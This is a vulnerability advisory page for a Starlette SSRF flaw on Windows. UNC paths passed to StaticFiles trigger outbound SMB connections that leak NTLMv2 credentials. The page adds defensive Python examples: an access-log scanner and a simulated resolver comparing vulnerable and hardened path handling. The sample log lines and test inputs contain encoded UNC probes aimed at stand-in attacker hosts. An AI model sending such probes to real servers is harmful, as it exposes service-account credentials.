CVE-2026-48818
Published 2026-06-17
Priority: P3 (48) · Severity: high · CVSS 3.1 base score: 7.5
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS: 0.37% (28.6th percentile)
Starlette is a lightweight ASGI framework/toolkit. In versions 1.0.1 and earlier, StaticFiles on Windows is vulnerable to SSRF. A UNC path such as \\attacker.com\share can cause os.path.realpath to initiate an outbound SMB connection before the path is rejected, exposing the service account's NTLMv2 credentials for offline cracking or relay even though the HTTP response is only a 404. The issue affects default follow_symlink=False deployments, including frameworks built on Starlette such as FastAPI; POSIX systems and deployments with follow_symlink=True are unaffected. The issue is fixed in 1.1.0.
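Because the only HTTP-side trace of a probe is a 404, the access log is where a defender has to look. The following is an added example, not part of the advisory or of the Starlette project: it scans constructed combined-format log lines for requests under an assumed `/static` mount whose percent-decoded remainder is UNC-shaped (begins with two separators, which ntpath reads as `\\host\share` whether they are slashes or backslashes). The mount path, the sample lines, and the `find_unc_requests` / `unc_host` names are all assumptions of the example.

```python
import re
from urllib.parse import unquote

# Constructed combined-format access-log lines; hosts, IPs and paths are made
# up for this example.  The 404 entries are the only HTTP-side trace the
# advisory says a UNC probe leaves.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jun/2026:10:01:02 +0000] "GET /static/css/app.css HTTP/1.1" 200 1834
10.0.0.9 - - [17/Jun/2026:10:01:07 +0000] "GET /static/%5C%5Cattacker.example%5Cshare%5Cx.css HTTP/1.1" 404 0
10.0.0.9 - - [17/Jun/2026:10:01:09 +0000] "GET /static/%2F%2Fattacker.example%2Fshare HTTP/1.1" 404 0
10.0.0.9 - - [17/Jun/2026:10:01:11 +0000] "GET /static/..%2F..%2FWindows%2Fwin.ini HTTP/1.1" 404 0
10.0.0.7 - - [17/Jun/2026:10:01:15 +0000] "GET /static/img/logo.png HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+$'
)

MOUNT = "/static"   # assumed mount path of the StaticFiles app (not stated in the advisory)


def unc_host(subpath):
    """Return the host named by a \\host\share-shaped path, else None.

    ntpath treats '/' and '\\' alike, so both separators are normalised
    before looking for the two leading separators that mark a UNC path.
    """
    s = subpath.replace("/", "\\")
    if s.startswith("\\\\"):
        host = s[2:].split("\\", 1)[0]
        return host or None
    return None


def find_unc_requests(log_text, mount=MOUNT):
    """Return one record per request under `mount` whose percent-decoded
    remainder is UNC-shaped, i.e. would reach the resolver as \\host\share."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m["target"].split("?", 1)[0]          # ignore any query string
        if not target.startswith(mount + "/"):
            continue
        remainder = unquote(target[len(mount) + 1:])   # decode once, as the server does
        host = unc_host(remainder)
        if host:
            hits.append({"client": m["client"], "ts": m["ts"], "host": host,
                         "status": m["status"], "raw": m["target"]})
    return hits


if __name__ == "__main__":
    for hit in find_unc_requests(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["client"]} -> UNC host {hit["host"]} (HTTP {hit["status"]}) {hit["raw"]}')
```

The path is decoded exactly once, which is what a typical server does before routing; a double-encoded probe (`%255C%255C...`) would need a second decoding pass if the deployment in question decodes twice. The `../` traversal line in the sample is deliberately not flagged: it is a different weakness and, per the advisory, is not what reaches the resolver as a UNC path. A hit on a host the web tier has no business contacting is worth correlating with outbound TCP 445 connection attempts from the same server at the same timestamp.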
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| encode | starlette | < 1.1.0 | 1.1.0 |
| encode | starlette | >= 0 < 1.1.0 | 1.1.0 |
| kludex | starlette | < 1.1.0 | 1.1.0 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| cvelistv5 | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| vendor_redhat | | 7.5 | HIGH | |
Red Hat
starlette: Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
vendor_redhat · 2026-06-17 · CVSS 7.5 · HIGH · CWE-918
A flaw was found in Starlette, a lightweight ASGI framework. On Windows systems, the StaticFiles component is vulner
CVEList
Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
cvelistv5 · 2026-06-17 · CVSS 7.5 · HIGH · CWE-918
VulDB
Kludex starlette up to 1.0.x on Windows SMB Connection server-side request forgery (EUVD-2026-37773)
vuldb · 2026-06-17 · rated CRITICAL by VulDB
A vulnerability was found in Kludex starlette up to 1.0.x on Windows. It has been declared as critical. Affected by this issue is some unknown functionality of the component SMB Connection Handler. Such manipulation leads to server-side request forgery.
This vulnerability is listed as CVE-2026-48818. The attack may be performed from remote. There is no available exploit.
It is recommended to upgrade the affected component.
GHSA
Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows
ghsa · 2026-06-15 · HIGH · CWE-918
### Summary
When serving static files on Windows, `StaticFiles` resolves the requested path with [`os.path.realpath`](https://docs.python.org/3/library/os.path.html#os.path.realpath). If a UNC path (such as `\\attacker.com\share`) reaches the resolver, `realpath` causes the process to open a connection to the remote host over SMB (port 445). This is a server-side request forgery (SSRF) that leaks the service account's NTLMv2 credentials to the attacker-controlled host, which can then be cracked offline or relayed to other hosts.
### Details
`StaticFiles.lookup_path()` joins the requested path onto the served directory and calls [`os.path.realpath`](https://docs.python.org/3/library/os.path.html#os.path.re
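The resolution order described above, side by side with an illustrative hardening, as an added example. This is not Starlette's code and not the 1.1.0 patch; it assumes a served directory `C:\app\static`, stands in for `os.path.realpath` with a `RecordingResolver` that only records which UNC host would have been contacted (so the example runs on any OS), and uses `ntpath` throughout so Windows path semantics apply everywhere. The names `lookup_resolve_then_check`, `lookup_check_then_resolve`, `_inside` and `compare` are the example's own.

```python
import ntpath

# Constructed served directory for the example.
ROOT = r"C:\app\static"


class RecordingResolver:
    """Stand-in for os.path.realpath.

    On a Windows host, realpath on \\host\share asks the OS to resolve the
    share, which opens an SMB session to `host` (TCP 445) and carries the
    service account's NTLM authentication.  Here the call is only recorded
    and a lexical normalisation is returned, so the example runs anywhere
    and the test can see what would have been dialled.
    """

    def __init__(self):
        self.unc_resolutions = []

    def __call__(self, path):
        norm = path.replace("/", "\\")
        if norm.startswith("\\\\"):
            self.unc_resolutions.append(norm[2:].split("\\", 1)[0])
        return ntpath.normpath(path)


def _inside(root, full):
    """True if `full` lies under `root` (both already normalised)."""
    try:
        common = ntpath.commonpath([root, full])
    except ValueError:      # different drive or UNC share, or absolute vs relative
        return False
    return ntpath.normcase(common) == ntpath.normcase(root)


def lookup_resolve_then_check(root, requested, resolver):
    """Resolve first, check containment second: the ordering the advisory
    describes (modelled on its text, not copied from Starlette).  The check
    does reject the UNC path (HTTP 404), but only after the resolver has
    already been handed \\host\share."""
    root = ntpath.normpath(root)
    # ntpath.join discards `root` entirely when `requested` is \\host\share or C:\...
    full = resolver(ntpath.join(root, requested))
    return full if _inside(root, full) else None


def lookup_check_then_resolve(root, requested, resolver):
    """Reject anything that is not a plain relative path lexically, before
    any call that can reach the filesystem or the network.  Illustrative
    hardening only; the upstream 1.1.0 fix is not reproduced here."""
    if "\x00" in requested:
        return None
    candidate = requested.replace("/", "\\")
    if candidate.startswith("\\"):                     # \\host\share, \\?\..., or rooted \foo
        return None
    if len(candidate) > 1 and candidate[1] == ":":     # C:\foo or C:foo
        return None
    parts = [p for p in candidate.split("\\") if p not in ("", ".")]
    if ".." in parts:                                  # traversal rejected lexically as well
        return None
    root = ntpath.normpath(root)
    full = resolver(ntpath.join(root, *parts))
    # Keep the post-resolution containment check as defence in depth
    # (junctions and symlinks are only visible after resolution).
    return full if _inside(root, full) else None


def compare(requested):
    """Run one request through both orderings with fresh resolvers and report
    what each returned and which UNC hosts each resolver would have contacted."""
    r_vuln, r_hard = RecordingResolver(), RecordingResolver()
    return {
        "vulnerable": (lookup_resolve_then_check(ROOT, requested, r_vuln), r_vuln.unc_resolutions),
        "hardened": (lookup_check_then_resolve(ROOT, requested, r_hard), r_hard.unc_resolutions),
    }


if __name__ == "__main__":
    for req in (r"css\app.css", r"\\attacker.com\share", "//attacker.com/share", "../../Windows/win.ini"):
        print(req, "->", compare(req))
```

Both orderings answer 404 for the UNC request; the difference is that only the second reaches that answer without ever handing the path to the resolver, which is the whole of the bug. Independently of upgrading to 1.1.0, a web host that has no business speaking SMB should have outbound TCP 445 blocked by host firewall or egress policy, which turns this class of leak into a failed connection rather than a captured NTLM exchange.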
No detection rules found.
No public exploits indexed.
References
https://github.com/Kludex/starlette/commit/fd53168a7767b6b55ba5af787fd88f49e33cabc5
https://github.com/Kludex/starlette/pull/3287
https://github.com/Kludex/starlette/releases/tag/1.1.0
https://github.com/Kludex/starlette/security/advisories/GHSA-wqp7-x3pw-xc5r
https://access.redhat.com/errata/RHSA-2026:30087
https://access.redhat.com/errata/RHSA-2026:30088
https://access.redhat.com/errata/RHSA-2026:30089
https://access.redhat.com/security/cve/CVE-2026-48818
https://bugzilla.redhat.com/show_bug.cgi?id=2490020
https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-48818.json